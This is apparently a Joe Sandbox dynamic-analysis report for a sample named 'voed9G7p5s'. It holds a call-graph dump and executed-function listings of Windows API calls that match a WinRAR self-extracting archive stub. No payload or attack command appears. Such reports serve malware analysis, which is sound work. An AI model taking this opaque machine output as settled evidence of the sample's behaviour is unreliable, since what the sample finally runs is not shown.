e10da8 GetCurrentProcessId AttachConsole 25051->25054 25055 e1081b 2 API calls 25052->25055 25123 e23e13 25054->25123 25057 e10d21 25055->25057 25059 e0e617 53 API calls 25057->25059 25058 e10dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25058->25053 25060 e10d3c 25059->25060 25061 e04092 _swprintf 51 API calls 25060->25061 25062 e10d4f 25061->25062 25063 e0e617 53 API calls 25062->25063 25064 e10d5e 25063->25064 25064->25053 25065->24865 25067 e1081b 2 API calls 25066->25067 25068 e1ac2a OleInitialize 25067->25068 25069 e1ac4d GdiplusStartup SHGetMalloc 25068->25069 25069->24867 25074 e1c5ce 25070->25074 25071 e1c6e4 25071->24875 25071->24876 25073 e11fac CharUpperW 25073->25074 25074->25071 25074->25073 25125 e0f3fa 82 API calls 2 library calls 25074->25125 25076 e1ec50 25075->25076 25077 e1dbeb SetEnvironmentVariableW 25076->25077 25079 e1dc0e 25077->25079 25078 e1dc36 25078->24869 25079->25078 25080 e1dc2a SetEnvironmentVariableW 25079->25080 25080->25078 25082 e1b70b GetObjectW 25081->25082 25083 e1b6fe 25081->25083 25088 e1b71a 25082->25088 25126 e1a6c2 FindResourceW 25083->25126 25085 e1a5c6 4 API calls 25087 e1b72d 25085->25087 25089 e1b770 25087->25089 25090 e1b74c 25087->25090 25091 e1a6c2 12 API calls 25087->25091 25088->25085 25100 e0da42 25089->25100 25140 e1a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25090->25140 25093 e1b73d 25091->25093 25093->25090 25095 e1b743 DeleteObject 25093->25095 25094 e1b754 25141 e1a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25094->25141 25095->25090 25097 e1b75d 25142 e1a80c 8 API calls 25097->25142 25099 e1b764 DeleteObject 25099->25089 25151 e0da67 25100->25151 25105 e190b7 25106 e1eb38 8 API calls 25105->25106 25107 e190d6 25106->25107 25107->24889 25109 e1acab GdiplusShutdown CoUninitialize 25108->25109 25109->24905 25111->24897 25112->24904 25114 e0b196 25113->25114 25115 e0b15a GetVersionExW 25113->25115 25114->25033 25115->25114 25117 e1ec50 25116->25117 25118 e10828 GetSystemDirectoryW 25117->25118 25119 e10840 25118->25119 25120 e1085e 25118->25120 25121 e10851 LoadLibraryW 25119->25121 25120->25033 25121->25120 25122->25027 25124 e23e1b 25123->25124 25124->25058 25124->25124 25125->25074 25127 e1a6e5 SizeofResource 25126->25127 25131 e1a7d3 25126->25131 25128 e1a6fc LoadResource 25127->25128 25127->25131 25129 e1a711 LockResource 25128->25129 25128->25131 25130 e1a722 GlobalAlloc 25129->25130 25129->25131 25130->25131 25132 e1a73d GlobalLock 25130->25132 25131->25082 25131->25088 25133 e1a7cc GlobalFree 25132->25133 25134 e1a74c __InternalCxxFrameHandler 25132->25134 25133->25131 25135 e1a7c5 GlobalUnlock 25134->25135 25143 e1a626 GdipAlloc 25134->25143 25135->25133 25138 e1a7b0 25138->25135 25139 e1a79a GdipCreateHBITMAPFromBitmap 25139->25138 25140->25094 25141->25097 25142->25099 25144 e1a645 25143->25144 25145 e1a638 25143->25145 25144->25135 25144->25138 25144->25139 25147 e1a3b9 25145->25147 25148 e1a3e1 GdipCreateBitmapFromStream 25147->25148 25149 e1a3da GdipCreateBitmapFromStreamICM 25147->25149 25150 e1a3e6 25148->25150 25149->25150 25150->25144 25152 e0da75 _wcschr __EH_prolog 25151->25152 25153 e0daa4 GetModuleFileNameW 25152->25153 25154 e0dad5 25152->25154 25155 e0dabe 25153->25155 25197 e098e0 25154->25197 25155->25154 25157 e0db31 25208 e26310 25157->25208 25158 e0959a 80 API calls 25159 e0da4e 25158->25159 25195 e0e29e GetModuleHandleW FindResourceW 25159->25195 25161 e0e261 78 API calls 25163 e0db05 25161->25163 25162 e0db44 25164 e26310 26 API calls 25162->25164 25163->25157 25163->25161 25175 e0dd4a 25163->25175 25172 e0db56 ___vcrt_InitializeCriticalSectionEx 25164->25172 25165 e0dc85 25165->25175 25228 e09d70 81 API calls 25165->25228 25167 e09e80 79 API calls 25167->25172 25169 e0dc9f ___std_exception_copy 25170 e09bd0 82 API calls 25169->25170 25169->25175 25173 e0dcc8 ___std_exception_copy 25170->25173 25172->25165 25172->25167 25172->25175 25222 e09bd0 25172->25222 25227 e09d70 81 API calls 25172->25227 25173->25175 25192 e0dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25173->25192 25229 e11b84 MultiByteToWideChar 25173->25229 25175->25158 25176 e0e159 25181 e0e1de 25176->25181 25235 e28cce 26 API calls 2 library calls 25176->25235 25178 e0e16e 25236 e27625 26 API calls 2 library calls 25178->25236 25180 e0e214 25186 e26310 26 API calls 25180->25186 25181->25180 25185 e0e261 78 API calls 25181->25185 25183 e0e1c6 25237 e0e27c 78 API calls 25183->25237 25185->25181 25187 e0e22d 25186->25187 25188 e26310 26 API calls 25187->25188 25188->25175 25190 e11da7 WideCharToMultiByte 25190->25192 25192->25175 25192->25176 25192->25190 25230 e0e5b1 50 API calls __vsnprintf 25192->25230 25231 e26159 26 API calls 3 library calls 25192->25231 25232 e28cce 26 API calls 2 library calls 25192->25232 25233 e27625 26 API calls 2 library calls 25192->25233 25234 e0e27c 78 API calls 25192->25234 25196 e0da55 25195->25196 25196->25105 25198 e098ea 25197->25198 25199 e0994b CreateFileW 25198->25199 25200 e0996c GetLastError 25199->25200 25204 e099bb 25199->25204 25201 e0bb03 GetCurrentDirectoryW 25200->25201 25202 e0998c 25201->25202 25203 e09990 CreateFileW GetLastError 25202->25203 25202->25204 25203->25204 25206 e099b5 25203->25206 25205 e099ff 25204->25205 25207 e099e5 SetFileTime 25204->25207 25205->25163 25206->25204 25207->25205 25209 e26349 25208->25209 25210 e2634d 25209->25210 25221 e26375 25209->25221 25238 e291a8 20 API calls __dosmaperr 25210->25238 25212 e26699 25214 e1fbbc CatchGuardHandler 5 API calls 25212->25214 25213 e26352 25239 e29087 26 API calls _abort 25213->25239 25216 e266a6 25214->25216 25216->25162 25217 e2635d 25218 e1fbbc CatchGuardHandler 5 API calls 25217->25218 25220 e26369 25218->25220 25220->25162 25221->25212 25240 e26230 5 API calls CatchGuardHandler 25221->25240 25223 e09bdc 25222->25223 25224 e09be3 25222->25224 25223->25172 25224->25223 25226 e09785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25224->25226 25241 e06d1a 77 API calls 25224->25241 25226->25224 25227->25172 25228->25169 25229->25192 25230->25192 25231->25192 25232->25192 25233->25192 25234->25192 25235->25178 25236->25183 25237->25181 25238->25213 25239->25217 25240->25221 25241->25224 25243 e27ce1 _abort 25242->25243 25244 e27cfa 25243->25244 25245 e27ce8 25243->25245 25266 e2ac31 EnterCriticalSection 25244->25266 25278 e27e2f GetModuleHandleW 25245->25278 25248 e27ced 25248->25244 25279 e27e73 GetModuleHandleExW 25248->25279 25253 e27de8 25288 e32390 5 API calls CatchGuardHandler 25253->25288 25254 e27dbc 25270 e27dee 25254->25270 25255 e27d8e 25257 e28a91 _abort 5 API calls 25255->25257 25256 e27d76 25256->25255 25262 e28a91 _abort 5 API calls 25256->25262 25263 e27d9f 25257->25263 25258 e27d01 25258->25256 25258->25263 25287 e287e0 20 API calls _abort 25258->25287 25262->25255 25267 e27ddf 25263->25267 25266->25258 25289 e2ac81 LeaveCriticalSection 25267->25289 25269 e27db8 25269->25253 25269->25254 25290 e2b076 25270->25290 25273 e27e1c 25276 e27e73 _abort 8 API calls 25273->25276 25274 e27dfc GetPEB 25274->25273 25275 e27e0c GetCurrentProcess TerminateProcess 25274->25275 25275->25273 25277 e27e24 ExitProcess 25276->25277 25278->25248 25280 e27ec0 25279->25280 25281 e27e9d GetProcAddress 25279->25281 25282 e27ec6 FreeLibrary 25280->25282 25283 e27ecf 25280->25283 25286 e27eb2 25281->25286 25282->25283 25284 e1fbbc CatchGuardHandler 5 API calls 25283->25284 25285 e27cf9 25284->25285 25285->25244 25286->25280 25287->25256 25289->25269 25291 e2b09b 25290->25291 25295 e2b091 25290->25295 25292 e2ac98 __dosmaperr 5 API calls 25291->25292 25292->25295 25293 e1fbbc CatchGuardHandler 5 API calls 25294 e27df8 25293->25294 25294->25273 25294->25274 25295->25293 25399 e11bbd GetCPInfo IsDBCSLeadByte 25359 e19580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25381 e1c793 102 API calls 5 library calls 25326 e1c793 97 API calls 4 library calls 25361 e1b18d 78 API calls 25328 e2b49d 6 API calls CatchGuardHandler 25382 e28268 55 API calls _free 25329 e1c793 107 API calls 5 library calls 25401 e27f6e 52 API calls 2 library calls 25330 e1a070 10 API calls 25383 e1b270 99 API calls 25403 e01f72 128 API calls __EH_prolog 24552 e09a74 24555 e09a7e 24552->24555 24553 e09b9d SetFilePointer 24554 e09bb6 GetLastError 24553->24554 24557 e09ab1 24553->24557 24554->24557 24555->24553 24556 e0981a 79 API calls 24555->24556 24555->24557 24558 e09b79 24555->24558 24556->24558 24558->24553 25332 e01075 84 API calls 24560 e09f7a 24561 e09f8f 24560->24561 24565 e09f88 24560->24565 24562 e09f9c GetStdHandle 24561->24562 24570 e09fab 24561->24570 24562->24570 24563 e0a003 WriteFile 24563->24570 24564 e09fd4 WriteFile 24566 e09fcf 24564->24566 24564->24570 24566->24564 24566->24570 24568 e0a095 24572 e06e98 77 API calls 24568->24572 24570->24563 24570->24564 24570->24565 24570->24566 24570->24568 24571 e06baa 78 API calls 24570->24571 24571->24570 24572->24565 25334 e1a440 GdipCloneImage GdipAlloc 25384 e23a40 5 API calls CatchGuardHandler 25404 e31f40 CloseHandle 24587 e1e44b 24588 e1e3f4 24587->24588 24588->24587 24589 e1e85d ___delayLoadHelper2@8 14 API calls 24588->24589 24589->24588 25336 e1e455 14 API calls ___delayLoadHelper2@8 24610 e1cd58 24611 e1ce22 24610->24611 24618 e1cd7b _wcschr 24610->24618 24614 e1c793 _wcslen _wcsrchr 24611->24614 24638 e1d78f 24611->24638 24612 e1b314 ExpandEnvironmentStringsW 24612->24614 24614->24612 24615 e1d40a 24614->24615 24619 e1ca67 SetWindowTextW 24614->24619 24622 e23e3e 22 API calls 24614->24622 24624 e1c855 SetFileAttributesW 24614->24624 24629 e1cc31 GetDlgItem SetWindowTextW SendMessageW 24614->24629 24632 e1cc71 SendMessageW 24614->24632 24637 e11fbb CompareStringW 24614->24637 24660 e1a64d GetCurrentDirectoryW 24614->24660 24662 e0a5d1 6 API calls 24614->24662 24663 e0a55a FindClose 24614->24663 24664 e1b48e 76 API calls 2 library calls 24614->24664 24617 e11fbb CompareStringW 24617->24618 24618->24611 24618->24617 24619->24614 24622->24614 24625 e1c90f GetFileAttributesW 24624->24625 24636 e1c86f __cftof _wcslen 24624->24636 24625->24614 24628 e1c921 DeleteFileW 24625->24628 24628->24614 24630 e1c932 24628->24630 24629->24614 24631 e04092 _swprintf 51 API calls 24630->24631 24633 e1c952 GetFileAttributesW 24631->24633 24632->24614 24633->24630 24634 e1c967 MoveFileW 24633->24634 24634->24614 24635 e1c97f MoveFileExW 24634->24635 24635->24614 24636->24614 24636->24625 24661 e0b991 51 API calls 3 library calls 24636->24661 24637->24614 24641 e1d799 __cftof _wcslen 24638->24641 24639 e1d9c0 24642 e1d9e7 24639->24642 24645 e1d9de ShowWindow 24639->24645 24640 e1d8a5 24644 e0a231 3 API calls 24640->24644 24641->24639 24641->24640 24641->24642 24665 e11fbb CompareStringW 24641->24665 24642->24614 24646 e1d8ba 24644->24646 24645->24642 24652 e1d8d1 24646->24652 24666 e0b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24646->24666 24648 e1d925 24667 e1dc3b 6 API calls 24648->24667 24649 e1d97b CloseHandle 24650 e1d989 24649->24650 24651 e1d994 24649->24651 24668 e11fbb CompareStringW 24650->24668 24651->24639 24652->24642 24652->24648 24652->24649 24654 e1d91b ShowWindow 24652->24654 24654->24648 24656 e1d93d 24656->24649 24657 e1d950 GetExitCodeProcess 24656->24657 24657->24649 24658 e1d963 24657->24658 24658->24649 24660->24614 24661->24636 24662->24614 24663->24614 24664->24614 24665->24640 24666->24652 24667->24656 24668->24651 25386 e1c220 93 API calls _swprintf 25338 e2f421 21 API calls __vsnwprintf_l 25339 e01025 29 API calls 25366 e2b4ae 27 API calls CatchGuardHandler 25367 e1f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25407 e1ff30 LocalFree 24681 e2bb30 24682 e2bb39 24681->24682 24684 e2bb42 24681->24684 24685 e2ba27 24682->24685 24686 e297e5 _abort 38 API calls 24685->24686 24687 e2ba34 24686->24687 24705 e2bb4e 24687->24705 24689 e2ba3c 24714 e2b7bb 24689->24714 24692 e2ba53 24692->24684 24693 e28e06 __vsnwprintf_l 21 API calls 24694 e2ba64 24693->24694 24695 e2ba96 24694->24695 24721 e2bbf0 24694->24721 24698 e28dcc _free 20 API calls 24695->24698 24698->24692 24699 e2ba91 24731 e291a8 20 API calls __dosmaperr 24699->24731 24701 e2bada 24701->24695 24732 e2b691 26 API calls 24701->24732 24702 e2baae 24702->24701 24703 e28dcc _free 20 API calls 24702->24703 24703->24701 24706 e2bb5a __FrameHandler3::FrameUnwindToState 24705->24706 24707 e297e5 _abort 38 API calls 24706->24707 24708 e2bb64 24707->24708 24711 e2bbe8 _abort 24708->24711 24713 e28dcc _free 20 API calls 24708->24713 24733 e28d24 38 API calls _abort 24708->24733 24734 e2ac31 EnterCriticalSection 24708->24734 24735 e2bbdf LeaveCriticalSection _abort 24708->24735 24711->24689 24713->24708 24715 e24636 __fassign 38 API calls 24714->24715 24716 e2b7cd 24715->24716 24717 e2b7ee 24716->24717 24718 e2b7dc GetOEMCP 24716->24718 24719 e2b805 24717->24719 24720 e2b7f3 GetACP 24717->24720 24718->24719 24719->24692 24719->24693 24720->24719 24722 e2b7bb 40 API calls 24721->24722 24723 e2bc0f 24722->24723 24725 e2bc60 IsValidCodePage 24723->24725 24728 e2bc16 24723->24728 24730 e2bc85 __cftof 24723->24730 24724 e1fbbc CatchGuardHandler 5 API calls 24726 e2ba89 24724->24726 24727 e2bc72 GetCPInfo 24725->24727 24725->24728 24726->24699 24726->24702 24727->24728 24727->24730 24728->24724 24736 e2b893 GetCPInfo 24730->24736 24731->24695 24732->24695 24734->24708 24735->24708 24737 e2b977 24736->24737 24741 e2b8cd 24736->24741 24740 e1fbbc CatchGuardHandler 5 API calls 24737->24740 24743 e2ba23 24740->24743 24746 e2c988 24741->24746 24743->24728 24745 e2ab78 __vsnwprintf_l 43 API calls 24745->24737 24747 e24636 __fassign 38 API calls 24746->24747 24748 e2c9a8 MultiByteToWideChar 24747->24748 24750 e2c9e6 24748->24750 24758 e2ca7e 24748->24758 24753 e28e06 __vsnwprintf_l 21 API calls 24750->24753 24756 e2ca07 __cftof __vsnwprintf_l 24750->24756 24751 e1fbbc CatchGuardHandler 5 API calls 24754 e2b92e 24751->24754 24752 e2ca78 24765 e2abc3 20 API calls _free 24752->24765 24753->24756 24760 e2ab78 24754->24760 24756->24752 24757 e2ca4c MultiByteToWideChar 24756->24757 24757->24752 24759 e2ca68 GetStringTypeW 24757->24759 24758->24751 24759->24752 24761 e24636 __fassign 38 API calls 24760->24761 24762 e2ab8b 24761->24762 24766 e2a95b 24762->24766 24765->24758 24767 e2a976 __vsnwprintf_l 24766->24767 24768 e2a99c MultiByteToWideChar 24767->24768 24769 e2ab50 24768->24769 24770 e2a9c6 24768->24770 24771 e1fbbc CatchGuardHandler 5 API calls 24769->24771 24775 e28e06 __vsnwprintf_l 21 API calls 24770->24775 24777 e2a9e7 __vsnwprintf_l 24770->24777 24772 e2ab63 24771->24772 24772->24745 24773 e2aa30 MultiByteToWideChar 24774 e2aa9c 24773->24774 24776 e2aa49 24773->24776 24802 e2abc3 20 API calls _free 24774->24802 24775->24777 24793 e2af6c 24776->24793 24777->24773 24777->24774 24781 e2aa73 24781->24774 24784 e2af6c __vsnwprintf_l 11 API calls 24781->24784 24782 e2aaab 24783 e28e06 __vsnwprintf_l 21 API calls 24782->24783 24787 e2aacc __vsnwprintf_l 24782->24787 24783->24787 24784->24774 24785 e2ab41 24801 e2abc3 20 API calls _free 24785->24801 24787->24785 24788 e2af6c __vsnwprintf_l 11 API calls 24787->24788 24789 e2ab20 24788->24789 24789->24785 24790 e2ab2f WideCharToMultiByte 24789->24790 24790->24785 24791 e2ab6f 24790->24791 24803 e2abc3 20 API calls _free 24791->24803 24794 e2ac98 __dosmaperr 5 API calls 24793->24794 24795 e2af93 24794->24795 24798 e2af9c 24795->24798 24804 e2aff4 10 API calls 3 library calls 24795->24804 24797 e2afdc LCMapStringW 24797->24798 24799 e1fbbc CatchGuardHandler 5 API calls 24798->24799 24800 e2aa60 24799->24800 24800->24774 24800->24781 24800->24782 24801->24774 24802->24769 24803->24774 24804->24797 25342 e2c030 GetProcessHeap 25343 e1a400 GdipDisposeImage GdipFree 25387 e1d600 70 API calls 25344 e26000 QueryPerformanceFrequency QueryPerformanceCounter 25369 e22900 6 API calls 4 library calls 25388 e2f200 51 API calls 25409 e2a700 21 API calls 25410 e01710 86 API calls 25372 e1ad10 73 API calls

                                                                                                    Executed Functions

                                                                                                    Function 00E1DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195filesleeptimeCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00E10863: GetModuleHandleW.KERNEL32(kernel32), ref: 00E1087C
                                                                                                      • Part of subcall function 00E10863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E1088E
                                                                                                      • Part of subcall function 00E10863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E108BF
                                                                                                      • Part of subcall function 00E1A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00E1A655
                                                                                                      • Part of subcall function 00E1AC16: OleInitialize.OLE32(00000000), ref: 00E1AC2F
                                                                                                      • Part of subcall function 00E1AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E1AC66
                                                                                                      • Part of subcall function 00E1AC16: SHGetMalloc.SHELL32(00E48438), ref: 00E1AC70
                                                                                                    • GetCommandLineW.KERNEL32 ref: 00E1DF5C
                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00E1DF83
                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00E1DF94
                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00E1DFCE
                                                                                                      • Part of subcall function 00E1DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00E1DBF4
                                                                                                      • Part of subcall function 00E1DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E1DC30
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E1DFD7
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00E5EC90,00000800), ref: 00E1DFF2
                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,00E5EC90), ref: 00E1DFFE
                                                                                                    • GetLocalTime.KERNEL32(?), ref: 00E1E009
                                                                                                    • _swprintf.LIBCMT ref: 00E1E048
                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00E1E05A
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00E1E061
                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 00E1E078
                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00E1E0C9
                                                                                                    • Sleep.KERNEL32(?), ref: 00E1E0F7
                                                                                                    • DeleteObject.GDI32 ref: 00E1E130
                                                                                                    • DeleteObject.GDI32(?), ref: 00E1E140
                                                                                                    • CloseHandle.KERNEL32 ref: 00E1E183
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
                                                                                                    • API String ID: 3049964643-271953491
                                                                                                    • Opcode ID: 4dca30f14138a3c52d996a3cacfdd009717af2429c577ff9c0d57259bcbb3e49
                                                                                                    • Instruction ID: ddaf07f152632c180e3eb3d80294fe3337d91dcb7a42857b1cd2d27804c01ff4
                                                                                                    • Opcode Fuzzy Hash: 4dca30f14138a3c52d996a3cacfdd009717af2429c577ff9c0d57259bcbb3e49
                                                                                                    • Instruction Fuzzy Hash: 53612A71605304BFD324AB72EC49FAB7BECAB45705F041429F945B2292DB7499CCC761
                                                                                                    Function 00E1A6C2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100memorywindowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 802 e1a6c2-e1a6df FindResourceW 803 e1a6e5-e1a6f6 SizeofResource 802->803 804 e1a7db 802->804 803->804 806 e1a6fc-e1a70b LoadResource 803->806 805 e1a7dd-e1a7e1 804->805 806->804 807 e1a711-e1a71c LockResource 806->807 807->804 808 e1a722-e1a737 GlobalAlloc 807->808 809 e1a7d3-e1a7d9 808->809 810 e1a73d-e1a746 GlobalLock 808->810 809->805 811 e1a7cc-e1a7cd GlobalFree 810->811 812 e1a74c-e1a76a call e20320 810->812 811->809 816 e1a7c5-e1a7c6 GlobalUnlock 812->816 817 e1a76c-e1a78e call e1a626 812->817 816->811 817->816 822 e1a790-e1a798 817->822 823 e1a7b3-e1a7c1 822->823 824 e1a79a-e1a7ae GdipCreateHBITMAPFromBitmap 822->824 823->816 824->823 825 e1a7b0 824->825 825->823
                                                                                                    APIs
                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E1B73D,00000066), ref: 00E1A6D5
                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A6EC
                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A703
                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A712
                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E1B73D,00000066), ref: 00E1A72D
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00E1A73E
                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E1A762
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00E1A7C6
                                                                                                      • Part of subcall function 00E1A626: GdipAlloc.GDIPLUS(00000010), ref: 00E1A62C
                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E1A7A7
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00E1A7CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                    • String ID: Fjun$PNG
                                                                                                    • API String ID: 211097158-1136719808
                                                                                                    • Opcode ID: 8e87ad5bb62a9a0bf58d48ad5fce3856c17da24b11c8f0eabcecab97b09462dc
                                                                                                    • Instruction ID: 14b67041cfec8f4027acf423a616415bbac7d4e9faf34e0d135400daec4db64e
                                                                                                    • Opcode Fuzzy Hash: 8e87ad5bb62a9a0bf58d48ad5fce3856c17da24b11c8f0eabcecab97b09462dc
                                                                                                    • Instruction Fuzzy Hash: 8D31B275502306AFC7209F32EC48D6BBFB8EF84765B04152AF805E2260EB31DD888A51
                                                                                                    Function 00E0A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1032 e0a69b-e0a6bf call e1ec50 1035 e0a6c1-e0a6ce FindFirstFileW 1032->1035 1036 e0a727-e0a730 FindNextFileW 1032->1036 1037 e0a6d0-e0a6e2 call e0bb03 1035->1037 1038 e0a742-e0a7ff call e10602 call e0c310 call e115da * 3 1035->1038 1036->1038 1039 e0a732-e0a740 GetLastError 1036->1039 1046 e0a6e4-e0a6fc FindFirstFileW 1037->1046 1047 e0a6fe-e0a707 GetLastError 1037->1047 1044 e0a804-e0a811 1038->1044 1041 e0a719-e0a722 1039->1041 1041->1044 1046->1038 1046->1047 1050 e0a717 1047->1050 1051 e0a709-e0a70c 1047->1051 1050->1041 1051->1050 1053 e0a70e-e0a711 1051->1053 1053->1050 1055 e0a713-e0a715 1053->1055 1055->1041
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6C4
                                                                                                      • Part of subcall function 00E0BB03: _wcslen.LIBCMT ref: 00E0BB27
                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6F2
                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A6FE
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A728
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00E0A592,000000FF,?,?), ref: 00E0A734
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
